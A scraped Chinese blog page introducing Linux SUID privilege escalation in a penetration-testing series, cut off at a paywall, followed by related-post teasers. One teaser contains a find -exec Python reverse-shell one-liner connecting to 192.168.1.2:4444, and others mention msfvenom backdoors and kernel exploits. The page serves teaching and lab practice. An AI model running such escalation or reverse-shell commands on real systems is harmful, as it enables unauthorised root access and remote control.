《WEB安全渗透测试》(27)Linux系统提权-SUID提权

已于 2022-06-14 00:13:07 修改
阅读量1k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: WEB安全渗透测试 文章标签: Web安全 linux 渗透测试 运维 网络安全
于 2022-06-14 00:11:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SouthWind0/article/details/125270004
本文详细介绍了Linux系统中的SUID提权方法,包括SUID权限的概念和作用。通过实例展示了如何在权限受限的情况下,利用SUID权限提升至root用户的步骤。在尝试内核漏洞提权失败后,作者转向SUID提权,最终成功获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.SUID提权介绍

提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了。

linux中除了r w x 三个权限外(分别代表r 读,w写,x执行),还有两个特殊的权限s 和t,当s权限在文件所有者x权限上时,例如:-rwsr-xr-x,此时称为Set UID,简称为SUID的特殊权限,即当执行该文件时将具有该文件所有者的权限。

2.内核漏洞提权

如下所示,可以看到我们是www-data,权限太低了。

通过uname -a可以看到这是Ubuntu系统,内核是4.4.0,下载linux.sh进行漏洞审计,先利用“脏牛”漏洞提权失败,再利用其他内核漏洞提权同样失败。

了解本专栏 订阅专栏 解锁全文 超级会员免费看
2023年湖南省网络安全B-3Linux系统渗透
FRANXX_02的博客
02-21 862
4.使用渗透机对服务器管理员,并将服务器中root目录下的文本内容作为flag交;6.使用渗透机对服务器管理员,并将服务器中root目录下的图片内容作为flag交。1.使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag交;5.使用渗透机对服务器管理员,并将服务器中root的密码作为flag交;3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag交;2.使用渗透机对服务器信息收集,并将服务器中主机名称作为flag交;直接使用上面给的密码,登录ssh。
20210411web渗透学习之Linux SUID
qq_45290991的博客
04-13 331
Linux下有很多方式,,我记得之前我写了一篇内核web渗透学习之Linux内核 内核最好用也是最通杀的“倚天剑”。。但是实战中很难使用……因为对方不是傻子都会打补丁……所以需要的是suid。。测试环境为ubutu15.5 SUIDLinux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。如果拥有SUID限,那么就可以利用系统中的二进制文件和工具来进行root。 就相当于说:我在使用这个文件的时候,我有了root限,,所以一般的思路就
20201231WEB渗透学习之Linux内核
qq_45290991的博客
01-01 966
我们都知道,如果已经获取了目标服务器(网站)的后门shell,那么我们接下啦要做的事情是什么????对,就是进程迁移(把自己的shell隐藏到一个不容易被肉鸡检测到的地方,比如说一个很深的目录下),但是要执行进程迁移,我们需要root限,所以实际上我们应该先升攻击者的限,来使得我们有着更高的限(比如说root)去操控肉鸡。在限的过程中,我们常常用到一个能够和肉鸡建立实时会话的TCP工具——————Netcat。网上的教程一般都是先开篇列出来这个工具的命令,然后后面接上一些实际例子,这样有好处也
20210414web渗透学习之Linux下三种主流学习(肠胃病住院期间更)
qq_45290991的博客
04-14 189
linux 实战Linux下三种不同方式的技巧 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> 介绍: 在...
LINUX渗透与总结
weixin_34255793的博客
03-15 625
本文为Linux渗透与技巧总结篇,旨在收集各种Linux渗透技巧与版本,方便各位同学在日后的渗透测试中能够事半功倍。 Linux 系统下的一些常见路径: 001 /etc/passwd 002   003 /etc/shadow 004   ...
linux内核,WEB安全第六章篇01 LINUX 内核漏洞
weixin_35203943的博客
04-29 233
WEB安全第六章篇01 LINUX 内核漏洞1、简介通常我们在拥有一个webshell的时候,一般限都是WEB容器限,如在iis就是iis用户组限,在apache 就是apache限,一般都是限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将到最高,如系统限 超级管理员限。2、创建交互shelllinux 需要交互s...
SUID:CVE-2021-4034漏洞全解析
02-22 2152
本篇是SUID系列文章的第三篇。建议大家按顺序先阅读前两篇铺垫。 第一篇我们讲解了SUID的基础知识,linux系统的用户、文件限与进程凭证。 第二篇我们讲解了SUID的原理,只要让具有SUID-root限的程序加载我们的so,我们就赢了。 第三篇我们来讲解CVE-2021-4034漏洞的原理以及利用过程。本文会按照下面主题进行分享: 什么是CVE? CVE-2021-4034介绍 漏洞分析 漏洞利用 漏洞修复 0x1 什么是CVE? CVE的英文全称是Common Vulnerab
WEB渗透Linux-SUID
qq_59468567的博客
09-06 359
$touch xxx $/usr/bin/find xxx –exec whoami \; $/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen
WEB渗透Linux-通配符
qq_59468567的博客
09-05 367
存在一个定时压缩目录的任务 生成反向shell。即可返回shell 或使用sudoer。低限登录 查看cron。
WEB渗透Linux-MYSQL漏洞
qq_59468567的博客
09-06 720
版本 MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL
VulnHub靶机系列实战教程:涵盖Web漏洞利用与Linux技术
最新发布
05-11
教程中还特别强调了对靶机环境的理解和配置,例如网络设置、服务版本识别等,并供了多种方法,如SUID、计划任务、内核等。此外,作者还分享了在遇到难题时寻求帮助的经验,包括通过社交媒体联系...
63-Linux脏牛内核漏洞&SUID&信息收集
san3144393495的博客
12-24 1187
今天讲到的方法是suid和内核漏洞。
Linux--SUID&内核漏洞本地用户
金灰的博客
04-29 1075
免责声明:本文仅做技术交流与学习,请不要乱搞破坏...
Linux--SUID
qq_37107430的博客
02-04 1428
SUID(Set User ID)是 Linux 和类 Unix 系统中用于文件限控制的一种机制。它使得执行某些程序时,程序进程会继承文件所有者的限,而不是执行者的限。通常,文件所有者是 root 用户。因此,通过 SUID ,攻击者可以绕过本应被限制的限,获得更高的限(如 root 限)。
Suid之find靶机渗透实战
PANDA墨森的博客
07-11 1638
这是vulnhub靶机系列文章的第十一篇,本次主要知识点为:drupal漏洞利用,suid之find命令 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13229881.html #001 实验环境 攻击机:kali :192.168.136.129 靶机:192.168.136.136 #002 寻找靶机ip Kali下使用netdisco..
系统渗透与防护——后门植入与SUID
m0_60643467的博客
10-09 2144
Msfvenom Msfvenom是MSF框架配套的攻击载荷生成器,可以用来生成木马程序,并在目标机上执行,在本地监听上线。 部分参数 -p:选择一个载荷 -f:生成的文件格式 -lhost:监听地址 -lport:监听端口 -o:输入文件名 -h:帮助 Msfvenom实验测试 Msfvenom生成后门文件 第一步,在kali生成后门文件 第二步,开启Linux靶机的root用户,并设置密码 上传后门文件至靶机 第三步,在kali中将后门文件发送到目标主机 在
内网渗透学习03——升分析与防御
box
02-22 4113
目录0x00 缺失补丁发现1. 命令查询补丁2. 工具查询补丁3. 其他补丁查询工具0x01数据库1. mysql数据库2. SQL Server 数据库3. Redis4. PostgreSql 数据库0x02 windows操作系统配置错误1. PowerUp2. AlwaysInstallElevated 3. Metasploit service_permissions利用4. 可信服务路径漏洞0x03 组策略首选项1. SYSVOL2. Group.xml3. 密码破解方式
vulnhub渗透系列之DC(一) :内含suid的三种方法
来到了学渣的博客
01-25 3049
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难,参考了很多资料做了很长的时间才解决 2.对端口信息扫描,探测存在22和80端口,但22端口ssh爆破无果,登录网站后发现是Drupal框 架,版本是7.x但不确定是哪个x 3.利用searchsp...
15.CTF-web安全
woo233的博客
09-29 2429
往往我们能拿下服务器的web服务只是具有低限用户(www-data),对于内网渗透,我们需要到root。Linux系统过程不止涉及到了漏洞,也涉及了很多系统配置。:已经拿到低shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有限上传文件和下载文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

午夜安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值